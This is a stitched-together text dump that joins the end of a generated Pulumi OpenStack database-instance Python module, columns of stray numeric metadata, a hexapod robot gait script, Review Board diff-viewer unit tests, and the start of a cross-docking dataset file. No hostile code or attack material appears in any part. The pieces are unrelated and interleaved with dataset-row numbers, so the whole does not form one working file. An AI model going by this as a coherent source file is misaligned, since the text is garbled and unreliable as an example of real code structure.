pulumi.set(self, "configuration_id", value)
@property
@pulumi.getter
def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]]:
"""
An array of database name, charset and collate. The database
object structure is documented below.
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter(name="flavorId")
def flavor_id(self) -> Optional[pulumi.Input[str]]:
"""
The flavor ID of the desired flavor for the instance.
Changing this creates new instance.
"""
return pulumi.get(self, "flavor_id")
@flavor_id.setter
def flavor_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "flavor_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Database to be created on new instance. Changing this creates a
new instance.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def networks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]]:
"""
An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
"""
return pulumi.get(self, "networks")
@networks.setter
def networks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]]):
pulumi.set(self, "networks", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to create the db instance. Changing this
creates a new instance.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def users(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]]:
"""
An array of username, password, host and databases. The user
object structure is documented below.
"""
return pulumi.get(self, "users")
@users.setter
def users(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]]):
pulumi.set(self, "users", value)
@pulumi.input_type
class _InstanceState:
def __init__(__self__, *,
addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]] = None,
datastore: Optional[pulumi.Input['InstanceDatastoreArgs']] = None,
flavor_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
networks: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]] = None):
"""
Input properties used for looking up and filtering Instance resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] addresses: A list of IP addresses assigned to the instance.
:param pulumi.Input[str] configuration_id: Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
:param pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]] databases: An array of database name, charset and collate. The database
object structure is documented below.
:param pulumi.Input['InstanceDatastoreArgs'] datastore: An array of database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
:param pulumi.Input[str] flavor_id: The flavor ID of the desired flavor for the instance.
Changing this creates new instance.
:param pulumi.Input[str] name: Database to be created on new instance. Changing this creates a
new instance.
:param pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]] networks: An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
:param pulumi.Input[str] region: The region in which to create the db instance. Changing this
creates a new instance.
:param pulumi.Input[int] size: Specifies the volume size in GB. Changing this creates new instance.
:param pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]] users: An array of username, password, host and databases. The user
object structure is documented below.
"""
if addresses is not None:
pulumi.set(__self__, "addresses", addresses)
if configuration_id is not None:
pulumi.set(__self__, "configuration_id", configuration_id)
if databases is not None:
pulumi.set(__self__, "databases", databases)
if datastore is not None:
pulumi.set(__self__, "datastore", datastore)
if flavor_id is not None:
pulumi.set(__self__, "flavor_id", flavor_id)
if name is not None:
pulumi.set(__self__, "name", name)
if networks is not None:
pulumi.set(__self__, "networks", networks)
if region is not None:
pulumi.set(__self__, "region", region)
if size is not None:
pulumi.set(__self__, "size", size)
if users is not None:
pulumi.set(__self__, "users", users)
@property
@pulumi.getter
def addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IP addresses assigned to the instance.
"""
return pulumi.get(self, "addresses")
@addresses.setter
def addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "addresses", value)
@property
@pulumi.getter(name="configurationId")
def configuration_id(self) -> Optional[pulumi.Input[str]]:
"""
Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
"""
return pulumi.get(self, "configuration_id")
@configuration_id.setter
def configuration_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "configuration_id", value)
@property
@pulumi.getter
def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]]:
"""
An array of database name, charset and collate. The database
object structure is documented below.
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter
def datastore(self) -> Optional[pulumi.Input['InstanceDatastoreArgs']]:
"""
An array of database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
"""
return pulumi.get(self, "datastore")
@datastore.setter
def datastore(self, value: Optional[pulumi.Input['InstanceDatastoreArgs']]):
pulumi.set(self, "datastore", value)
@property
@pulumi.getter(name="flavorId")
def flavor_id(self) -> Optional[pulumi.Input[str]]:
"""
The flavor ID of the desired flavor for the instance.
Changing this creates new instance.
"""
return pulumi.get(self, "flavor_id")
@flavor_id.setter
def flavor_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "flavor_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Database to be created on new instance. Changing this creates a
new instance.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def networks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]]:
"""
An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
"""
return pulumi.get(self, "networks")
@networks.setter
def networks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]]):
pulumi.set(self, "networks", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to create the db instance. Changing this
creates a new instance.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the volume size in GB. Changing this creates new instance.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def users(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]]:
"""
An array of username, password, host and databases. The user
object structure is documented below.
"""
return pulumi.get(self, "users")
@users.setter
def users(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]]):
pulumi.set(self, "users", value)
class Instance(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceDatabaseArgs']]]]] = None,
datastore: Optional[pulumi.Input[pulumi.InputType['InstanceDatastoreArgs']]] = None,
flavor_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceNetworkArgs']]]]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceUserArgs']]]]] = None,
__props__=None):
"""
Create a Instance resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] configuration_id: Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceDatabaseArgs']]]] databases: An array of database name, charset and collate. The database
object structure is documented below.
:param pulumi.Input[pulumi.InputType['InstanceDatastoreArgs']] datastore: An array of database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
:param pulumi.Input[str] flavor_id: The flavor ID of the desired flavor for the instance.
Changing this creates new instance.
:param pulumi.Input[str] name: Database to be created on new instance. Changing this creates a
new instance.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceNetworkArgs']]]] networks: An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
:param pulumi.Input[str] region: The region in which to create the db instance. Changing this
creates a new instance.
:param pulumi.Input[int] size: Specifies the volume size in GB. Changing this creates new instance.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceUserArgs']]]] users: An array of username, password, host and databases. The user
object structure is documented below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: InstanceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a Instance resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param InstanceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InstanceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceDatabaseArgs']]]]] = None,
datastore: Optional[pulumi.Input[pulumi.InputType['InstanceDatastoreArgs']]] = None,
flavor_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceNetworkArgs']]]]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceUserArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = InstanceArgs.__new__(InstanceArgs)
__props__.__dict__["configuration_id"] = configuration_id
__props__.__dict__["databases"] = databases
if datastore is None and not opts.urn:
raise TypeError("Missing required property 'datastore'")
__props__.__dict__["datastore"] = datastore
__props__.__dict__["flavor_id"] = flavor_id
__props__.__dict__["name"] = name
__props__.__dict__["networks"] = networks
__props__.__dict__["region"] = region
if size is None and not opts.urn:
raise TypeError("Missing required property 'size'")
__props__.__dict__["size"] = size
__props__.__dict__["users"] = users
__props__.__dict__["addresses"] = None
super(Instance, __self__).__init__(
'openstack:database/instance:Instance',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceDatabaseArgs']]]]] = None,
datastore: Optional[pulumi.Input[pulumi.InputType['InstanceDatastoreArgs']]] = None,
flavor_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceNetworkArgs']]]]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceUserArgs']]]]] = None) -> 'Instance':
"""
Get an existing Instance resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] addresses: A list of IP addresses assigned to the instance.
:param pulumi.Input[str] configuration_id: Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceDatabaseArgs']]]] databases: An array of database name, charset and collate. The database
object structure is documented below.
:param pulumi.Input[pulumi.InputType['InstanceDatastoreArgs']] datastore: An array of database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
:param pulumi.Input[str] flavor_id: The flavor ID of the desired flavor for the instance.
Changing this creates new instance.
:param pulumi.Input[str] name: Database to be created on new instance. Changing this creates a
new instance.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceNetworkArgs']]]] networks: An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
:param pulumi.Input[str] region: The region in which to create the db instance. Changing this
creates a new instance.
:param pulumi.Input[int] size: Specifies the volume size in GB. Changing this creates new instance.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceUserArgs']]]] users: An array of username, password, host and databases. The user
object structure is documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _InstanceState.__new__(_InstanceState)
__props__.__dict__["addresses"] = addresses
__props__.__dict__["configuration_id"] = configuration_id
__props__.__dict__["databases"] = databases
__props__.__dict__["datastore"] = datastore
__props__.__dict__["flavor_id"] = flavor_id
__props__.__dict__["name"] = name
__props__.__dict__["networks"] = networks
__props__.__dict__["region"] = region
__props__.__dict__["size"] = size
__props__.__dict__["users"] = users
return Instance(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def addresses(self) -> pulumi.Output[Sequence[str]]:
"""
A list of IP addresses assigned to the instance.
"""
return pulumi.get(self, "addresses")
@property
@pulumi.getter(name="configurationId")
def configuration_id(self) -> pulumi.Output[Optional[str]]:
"""
Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
"""
return pulumi.get(self, "configuration_id")
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Optional[Sequence['outputs.InstanceDatabase']]]:
"""
An array of database name, charset and collate. The database
object structure is documented below.
"""
return pulumi.get(self, "databases")
@property
@pulumi.getter
def datastore(self) -> pulumi.Output['outputs.InstanceDatastore']:
"""
An array of database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
"""
return pulumi.get(self, "datastore")
@property
@pulumi.getter(name="flavorId")
def flavor_id(self) -> pulumi.Output[str]:
"""
The flavor ID of the desired flavor for the instance.
Changing this creates new instance.
"""
return pulumi.get(self, "flavor_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Database to be created on new instance. Changing this creates a
new instance.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def networks(self) -> pulumi.Output[Optional[Sequence['outputs.InstanceNetwork']]]:
"""
An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
"""
return pulumi.get(self, "networks")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region in which to create the db instance. Changing this
creates a new instance.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def size(self) -> pulumi.Output[int]:
"""
Specifies the volume size in GB. Changing this creates new instance.
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def users(self) -> pulumi.Output[Optional[Sequence['outputs.InstanceUser']]]:
"""
An array of username, password, host and databases. The user
object structure is documented below.
"""
return pulumi.get(self, "users")
| 45.787682
| 165
| 0.646915
| 3,212
| 28,251
| 5.551681
| 0.056351
| 0.106101
| 0.084175
| 0.063089
| 0.894515
| 0.880047
| 0.851503
| 0.838324
| 0.828791
| 0.822734
| 0
| 0.000047
| 0.253088
| 28,251
| 616
| 166
| 45.862013
| 0.845031
| 0.35712
| 0
| 0.772861
| 1
| 0
| 0.110269
| 0.018004
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162242
| false
| 0.00295
| 0.020649
| 0
| 0.280236
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1eefc9ad7bdeddb88c096cd73581531eabb1912f
| 1,626
|
py
|
Python
|
DemoMoves/RotateRight.py
|
johan--/PoMoCo_RobCook
|
0ca95286b0f21803ed3a33cbad6d11fce4d7172a
|
[
"MIT",
"Unlicense"
] | 1
|
2020-11-20T08:05:55.000Z
|
2020-11-20T08:05:55.000Z
|
DemoMoves/RotateRight.py
|
rpcook/PoMoCo
|
08f5170006bafabc2d70d5a681b62f7448afdbd2
|
[
"Unlicense",
"MIT"
] | null | null | null |
DemoMoves/RotateRight.py
|
rpcook/PoMoCo
|
08f5170006bafabc2d70d5a681b62f7448afdbd2
|
[
"Unlicense",
"MIT"
] | null | null | null |
import time
import math
from ikLibrary import * # Inverse-Kinematic Library developed by Rob Cook, information on http://robcook.eu
# scale factor (distance from neutral in step direction)
s=23
# direction (CCW from forwards)
theta = math.pi
# define movements to walk in a particular direction
# step position 2, tripod 1 in upper mid position, tripod 2 in lower mid position
hexyTripod1GlobalOffset(0,0,-14)
hexyTripod2GlobalOffset(0,0,0)
time.sleep(0.2)
# step position 3, tripod 1 in rear position, tripod 2 in forward position
hexyTripod1GlobalOffsetRot(0,0,0,-0.15)
hexyTripod2GlobalOffsetRot(0,0,0,0.15)
time.sleep(0.2)
# step position 4, tripod 1 in lower mid position, tripod 2 in upper mid position
hexyTripod1GlobalOffset(0,0,0)
hexyTripod2GlobalOffset(0,0,-14)
time.sleep(0.2)
# step position 1, tripod 1 in forward position, tripod 2 in rear position
hexyTripod1GlobalOffsetRot(0,0,0,0.15)
hexyTripod2GlobalOffsetRot(0,0,0,-0.15)
time.sleep(0.2)
# step position 2, tripod 1 in upper mid position, tripod 2 in lower mid position
hexyTripod1GlobalOffset(0,0,-14)
hexyTripod2GlobalOffset(0,0,0)
time.sleep(0.2)
# step position 3, tripod 1 in rear position, tripod 2 in forward position
hexyTripod1GlobalOffsetRot(0,0,0,-0.15)
hexyTripod2GlobalOffsetRot(0,0,0,0.15)
time.sleep(0.2)
# step position 4, tripod 1 in lower mid position, tripod 2 in upper mid position
hexyTripod1GlobalOffset(0,0,0)
hexyTripod2GlobalOffset(0,0,-14)
time.sleep(0.2)
# step position 1, tripod 1 in forward position, tripod 2 in rear position
hexyTripod1GlobalOffsetRot(0,0,0,0.15)
hexyTripod2GlobalOffsetRot(0,0,0,-0.15)
time.sleep(0.2)
| 36.954545
| 107
| 0.782288
| 268
| 1,626
| 4.746269
| 0.205224
| 0.056604
| 0.04717
| 0.106918
| 0.81761
| 0.81761
| 0.81761
| 0.81761
| 0.81761
| 0.81761
| 0
| 0.093445
| 0.118081
| 1,626
| 43
| 108
| 37.813953
| 0.793584
| 0.50984
| 0
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.103448
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4839374e7b6329660e6e92b0d841a0f100b50a1c
| 11,157
|
py
|
Python
|
reviewboard/reviews/tests/test_reviews_diff_viewer_view.py
|
pombredanne/reviewboard
|
15f1d7236ec7a5cb4778ebfeb8b45d13a46ac71d
|
[
"MIT"
] | null | null | null |
reviewboard/reviews/tests/test_reviews_diff_viewer_view.py
|
pombredanne/reviewboard
|
15f1d7236ec7a5cb4778ebfeb8b45d13a46ac71d
|
[
"MIT"
] | null | null | null |
reviewboard/reviews/tests/test_reviews_diff_viewer_view.py
|
pombredanne/reviewboard
|
15f1d7236ec7a5cb4778ebfeb8b45d13a46ac71d
|
[
"MIT"
] | null | null | null |
"""Unit tests for reviewboard.reviews.views.ReviewsDiffViewerView."""
from reviewboard.site.urlresolvers import local_site_reverse
from reviewboard.testing import TestCase
class ReviewsDiffViewerViewTests(TestCase):
"""Unit tests for reviewboard.reviews.views.ReviewsDiffViewerView."""
fixtures = ['test_users', 'test_scmtools']
# Bug 892
def test_interdiff(self):
"""Testing ReviewsDiffViewerView with interdiffs"""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request, revision=1)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/readme',
dest_file='/readme',
source_revision='d6613f5',
dest_detail='5b50866',
diff=(
b'diff --git a/readme b/readme\n'
b'index d6613f5..5b50866 100644\n'
b'--- a/readme\n'
b'+++ b/readme\n'
b'@@ -1 +1,3 @@\n'
b' Hello there\n'
b'+\n'
b'+Oh hi!\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd3\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a new file!\n'
))
diffset = self.create_diffset(review_request, revision=2)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/readme',
dest_file='/readme',
source_revision='d6613f5',
dest_detail='5b50867',
diff=(
b'diff --git a/readme b/readme\n'
b'index d6613f5..5b50867 100644\n'
b'--- a/readme\n'
b'+++ b/readme\n'
b'@@ -1 +1,3 @@\n'
b' Hello there\n'
b'+----------\n'
b'+Oh hi!\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd4\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a diffent version of this new file!\n'
))
response = self.client.get('/r/1/diff/1-2/')
# Useful for debugging any actual errors here.
if response.status_code != 200:
print('Error: %s' % response.context['error'])
print(response.context['trace'])
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['diff_context']['num_diffs'], 2)
files = response.context['files']
self.assertTrue(files)
self.assertEqual(len(files), 2)
self.assertEqual(files[0]['depot_filename'], '/newfile')
self.assertIn('interfilediff', files[0])
self.assertEqual(files[1]['depot_filename'], '/readme')
self.assertIn('interfilediff', files[1])
# Bug 847
def test_interdiff_new_file(self):
"""Testing ReviewsDiffViewrView with interdiffs containing new files"""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request, revision=1)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
diffset = self.create_diffset(review_request, revision=2)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd4\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a diffent version of this new file!\n'
))
response = self.client.get('/r/1/diff/1-2/')
# Useful for debugging any actual errors here.
if response.status_code != 200:
print('Error: %s' % response.context['error'])
print(response.context['trace'])
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['diff_context']['num_diffs'], 2)
files = response.context['files']
self.assertTrue(files)
self.assertEqual(len(files), 1)
self.assertEqual(files[0]['depot_filename'], '/newfile')
self.assertIn('interfilediff', files[0])
def test_with_filenames_option(self):
"""Testing ReviewsDiffViewerView with ?filenames=..."""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff1 = self.create_filediff(diffset,
source_file='src/main/test.c',
dest_file='src/main/test.cpp')
filediff2 = self.create_filediff(diffset,
source_file='docs/README.txt',
dest_file='docs/README2.txt')
filediff3 = self.create_filediff(diffset,
source_file='test.txt',
dest_file='test.rst')
filediff4 = self.create_filediff(diffset,
source_file='/lib/lib.h',
dest_file='/lib/lib.h')
self.create_filediff(diffset,
source_file='unmatched',
dest_file='unmatched')
response = self.client.get(
local_site_reverse(
'view-diff-revision',
kwargs={
'review_request_id': review_request.display_id,
'revision': diffset.revision,
}),
{
'filenames': '*/test.cpp,*.txt,/lib/*',
})
self.assertEqual(response.status_code, 200)
files = response.context['files']
self.assertEqual({file_info['filediff'] for file_info in files},
{filediff1, filediff2, filediff3, filediff4})
def test_with_filenames_option_normalized(self):
"""Testing ReviewsDiffViewerView with ?filenames=... values normalized
"""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff1 = self.create_filediff(diffset,
source_file='src/main/test.c',
dest_file='src/main/test.cpp')
filediff2 = self.create_filediff(diffset,
source_file='docs/README.txt',
dest_file='docs/README2.txt')
filediff3 = self.create_filediff(diffset,
source_file='test.txt',
dest_file='test.rst')
filediff4 = self.create_filediff(diffset,
source_file='/lib/lib.h',
dest_file='/lib/lib.h')
self.create_filediff(diffset,
source_file='unmatched',
dest_file='unmatched')
response = self.client.get(
local_site_reverse(
'view-diff-revision',
kwargs={
'review_request_id': review_request.display_id,
'revision': diffset.revision,
}),
{
'filenames': ' , , */test.cpp,,,*.txt,/lib/* ',
})
self.assertEqual(response.status_code, 200)
files = response.context['files']
self.assertEqual({file_info['filediff'] for file_info in files},
{filediff1, filediff2, filediff3, filediff4})
| 38.739583
| 79
| 0.482657
| 1,124
| 11,157
| 4.652135
| 0.124555
| 0.024479
| 0.065404
| 0.09084
| 0.912412
| 0.885255
| 0.885255
| 0.863836
| 0.863836
| 0.863836
| 0
| 0.044718
| 0.396702
| 11,157
| 287
| 80
| 38.874564
| 0.732135
| 0.042395
| 0
| 0.903614
| 0
| 0
| 0.23277
| 0.004507
| 0
| 0
| 0
| 0
| 0.072289
| 1
| 0.016064
| false
| 0
| 0.056225
| 0
| 0.080321
| 0.016064
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48479527f2f2a80a022f033ccc8cbae00939af20
| 15,232
|
py
|
Python
|
crossdock/problems/experiment/crossdock_75_125_20_25_25.py
|
krerkkiat/icpr-2019-public
|
f3023c009f3335ce58204a45c270cfeb6ef19367
|
[
"BSD-3-Clause"
] | null | null | null |
crossdock/problems/experiment/crossdock_75_125_20_25_25.py
|
krerkkiat/icpr-2019-public
|
f3023c009f3335ce58204a45c270cfeb6ef19367
|
[
"BSD-3-Clause"
] | null | null | null |
crossdock/problems/experiment/crossdock_75_125_20_25_25.py
|
krerkkiat/icpr-2019-public
|
f3023c009f3335ce58204a45c270cfeb6ef19367
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Cross-docking truck data.
This data is generated by a generate_dataset.py script.
Created: Feb 18, 2019 at 07:30:04 PM
Copyright (c) 2022, Krerkkiat Chusap
This souce code is licensed under BSD 3-Clause "New" or "Revised" License (see LICENSE for details).
"""
from pathlib import Path
# Problem data.
name = Path(__file__).stem
